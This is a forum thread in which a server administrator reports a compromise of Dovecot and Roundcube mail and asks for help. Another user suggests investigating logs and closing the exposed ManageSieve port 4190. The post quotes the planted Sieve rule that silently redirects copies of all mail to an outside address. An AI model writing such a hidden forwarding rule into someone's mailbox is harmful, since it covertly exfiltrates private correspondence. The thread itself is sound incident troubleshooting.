dovecot / roundcube sieve hack

[th£ lord]

Hello Friends,
as I mentioned in the topic title, I noticed that e-mail was forwarded by somehow accessing it from somewhere (I couldn't find the vulnerability).
In short, for example, the e-mail sent to me is sent directly to the forwarded e-mail address and thus the conversations are followed.
The following script has been added to the filters in webmail.

Sample Added Script:

require ["copy"];
# rule:[.]
if true
{
redirect :copy "[email protected]";
}

Files with hacked content (created)

/home/zixxls/imap/xxxxx.com/mimari/.dovecot.sieve (The redirect is written into the content of this file.)
/home/zixxls/imap/xxxxx.com/info/.dovecot.sieve.log

/home/zixxls/imap/xxxxx.com/sales/.dovecot.sieve (The redirect is written into the content of this file.)
/home/zixxls/imap/xxxxx.com/sales/.dovecot.sieve.log
/home/zixxls/imap/xxxxx.com/sales/.dovecot.sieve.log.0

/home/zixxls/imap/xxxxx.com/sales.fac/.dovecot.sieve (The redirect is written into the content of this file.)
/home/zixxls/imap/xxxxx.com/sales.fac/.dovecot.sieve.log
/home/zixxls/imap/xxxxx.com/sales.fac/.dovecot.sieve.log.0

/home/zixxls/imap/xxxxx.com/transport.fac/.dovecot.sieve (The redirect is written into the content of this file.)
/home/zixxls/imap/xxxxx.com/transport.fac/.dovecot.sieve.log


Note :
- My email passwords are quite strong.
- Only outlook is installed on the computers and the computers are specially protected with a virus program.
- I always try to keep the server updated.


Server Operating Information and Directadmin Versions

NAME="CentOS Linux"​

VERSION="8"​

ID="centos"​

ID_LIKE="rhel fedora"​

VERSION_ID="8"​

PLATFORM_ID="platform:el8"​

PRETTY_NAME="CentOS Linux 8"​

CENTOS_MANTISBT_PROJECT="CentOS-8"​

CENTOS_MANTISBT_PROJECT_VERSION="8"​

---

• Apache 2.4.58 Running
• DirectAdmin 1.661 Running
• Exim 4.97.1 Running
• MariaDB 10.4.33 Running
• Named 9.11.26 Running
• sshd Running
• Nginx 1.25.4 Running
• dovecot 2.3.21 (47349e2482) Running
• pure-ftpd 1.0.51 Running
• Php 7.4.33 Installed
• Php 5.6.40 Installed (php2)

Where could there be a security vulnerability to find the solution to this problem?
I would like to thank my dear friends in advance who have ideas about how this hack was created and shared it with me.

Regards,

 

[zEitEr]

Hello,

If you did not modify the listed files, you might check the time of the last modification of the files and which activity can be found on the same time in RoundCube, FTP, Webserver, DirectAdmin logs.

Check whether you allow one-click access to RoundCube from DirectAdmin.
Make sure you did not create the filters in RoundCube.

 

[th£ lord]

Hello,

If you did not modify the listed files, you might check the time of the last modification of the files and which activity can be found on the same time in RoundCube, FTP, Webserver, DirectAdmin logs.

Check whether you allow one-click access to RoundCube from DirectAdmin.
Make sure you did not create the filters in RoundCube.

Hello zEitEr,
It's nice talking to you.

When I noticed this, I immediately deleted the files and folders.

That's why I don't see any change now. How could they do this in a different way? For example, if I turn off the roundcube webmail completely with .htaccess (this is a security measure), there will be no problem since the friends are already connected via Outlook.
I think they can leak the information via Outlook and make this change via Roundcube.

In my research, a different panel user experienced this problem.
I have this same problem now. " https://talk.plesk.com/threads/dovecot-roundcube-sieve-hack.362814/ "

"Check whether you allow one-click access to RoundCube from DirectAdmin."​

The connection between Directadmin and Roundcube is just a link. The username and password section opens. It doesn't let you in directly. Your normal settings.​

​

"Make sure you did not create the filters in RoundCube."​

I asked all my friends who use e-mail within the company. But no one has done this in Roundcube. Everyone just connects via Outlook.​

 

[zEitEr]

How could they do this in a different way?

Actually by any means which allows creating or uploading a file on a server: PHP/Perl/bash, FTP, POP/IMAP/SMTP(?), SSH, Directadmin, RoundCube, vulnerable web-site of the user, webshell, etc.

I'm not too sure about OutLook though. Can not say whether or not it allows using Sieve/Pigeonhole. Should be checked.

Dovecot listens 4190 port among others. The port is used for Sieve. By default it's bind to 0.0.0.0:

# netstat -ntpl | grep 4190
tcp        0      0 0.0.0.0:4190            0.0.0.0:*               LISTEN      1216/dovecot
tcp6       0      0 :::4190                 :::*                    LISTEN      1216/dovecot

If you don't use a firewall, and/or if the port is opened worldwide or a list of IPs, then they could potentially connect to it directly:

# telnet 127.0.0.1 4190
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
"IMPLEMENTATION" "Dovecot Pigeonhole"
"SIEVE" "fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date index ihave duplicate mime foreverypart extracttext"
"NOTIFY" "mailto"
"SASL" "PLAIN"
"STARTTLS"
"VERSION" "1.0"
OK "Dovecot DA ready."

So first of all make sure the port is not accessible outside of your server.

 

[th£ lord]

Actually by any means which allows creating or uploading a file on a server: PHP/Perl/bash, FTP, POP/IMAP/SMTP(?), SSH, Directadmin, RoundCube, vulnerable web-site of the user, webshell, etc.

I'm not too sure about OutLook though. Can not say whether or not it allows using Sieve/Pigeonhole. Should be checked.

Dovecot listens 4190 port among others. The port is used for Sieve. By default it's bind to 0.0.0.0:

# netstat -ntpl | grep 4190
tcp        0      0 0.0.0.0:4190            0.0.0.0:*               LISTEN      1216/dovecot
tcp6       0      0 :::4190                 :::*                    LISTEN      1216/dovecot

If you don't use a firewall, and/or if the port is opened worldwide or a list of IPs, then they could potentially connect to it directly:

# telnet 127.0.0.1 4190
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
"IMPLEMENTATION" "Dovecot Pigeonhole"
"SIEVE" "fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date index ihave duplicate mime foreverypart extracttext"
"NOTIFY" "mailto"
"SASL" "PLAIN"
"STARTTLS"
"VERSION" "1.0"
OK "Dovecot DA ready."

So first of all make sure the port is not accessible outside of your server.

Hello zEitEr,

CSF firewall is installed on the server. Security settings are more stringent than normal.
The SSH connection port has been changed and is open to several Private IP addresses.
FTP is publicly accessible, but the accessible area cannot go beyond the relevant host.
When 10 incorrect passwords are entered to log in, the server permanently bans the IP address it is trying to connect to.
Many known security processes such as are active on the server.

4190 Port

# netstat -ntpl | grep 4190
tcp 0 0 0.0.0.0:4190 0.0.0.0:* LISTEN 1100/dovecot
tcp6 0 0 :::4190 :::* LISTEN 1100/dovecot

TELNET :

telnet 127.0.0.1 4190
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
"IMPLEMENTATION" "Dovecot Pigeonhole"
"SIEVE" "fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date index ihave duplicate mime foreverypart extracttext"
"NOTIFY" "mailto"
"SASL" "PLAIN"
"STARTTLS"
"VERSION" "1.0"
OK "Dovecot DA ready."

- I tested it when the connection failed when I wanted to log in via Telnet from outside.
- I also checked it from different online systems other than my own network.


Online Check Site :

Telnet Online

telnet, ping, traceroute, md5, sha1 online service. ÑелнеÑ(telnet), пинг(ping), ÑÑÑйÑÑоÑÑ(traceroute) ÑеÑвиÑ

telnet-online.net

Connection to xxx.xxx.xxx 4190 - fail
Error #110 (Connection timed out)

So what have I done for now? What security precautions did I take?
I enabled IP control in the Roundcube folder with .htaccess.
No IP other than the allowed IP will be able to access this folder. Since there is IP control over the link, roundcube will only open for the IP addresses I allow.

/var/www/html/roundcubemail-1.6.6/

If dovecot or exim or anything else on the server (I don't know what directadmin uses) is open, I definitely don't think you can log in.
I can only think that you can somehow obtain this email information installed in Outlook, log in via mail.domain.com/webmail or domain.com/webmail and add it via your own roundcube. Or something different.

In this case, I watch it constantly. If the security measures I mentioned are still bypassed and the user logs in, then I think there may be a vulnerability on the server. What do you think?

I'm open to all ideas. Really, this can happen to anyone. Thnks.

Note: ​

I scanned with malware version maldetect-1.6.4. It did not find any malware. ​

I uploaded a malware into the folder for testing. I scanned it again and it still couldn't find it. I wonder if Maldet does not work fully on new version systems? Does anyone have knowledge about this? This is a second incident that I see now while testing.​

Regards,

 

[zEitEr]

In this case, I watch it constantly. If the security measures I mentioned are still bypassed and the user logs in, then I think there may be a vulnerability on the server. What do you think?

You've got the list of ways they could create/overwrite the file. I have nothing to add. Probably somebody had the same issue, and can give more information.

I wonder if Maldet does not work fully on new version systems?

the default malware definition databases - that is the reason.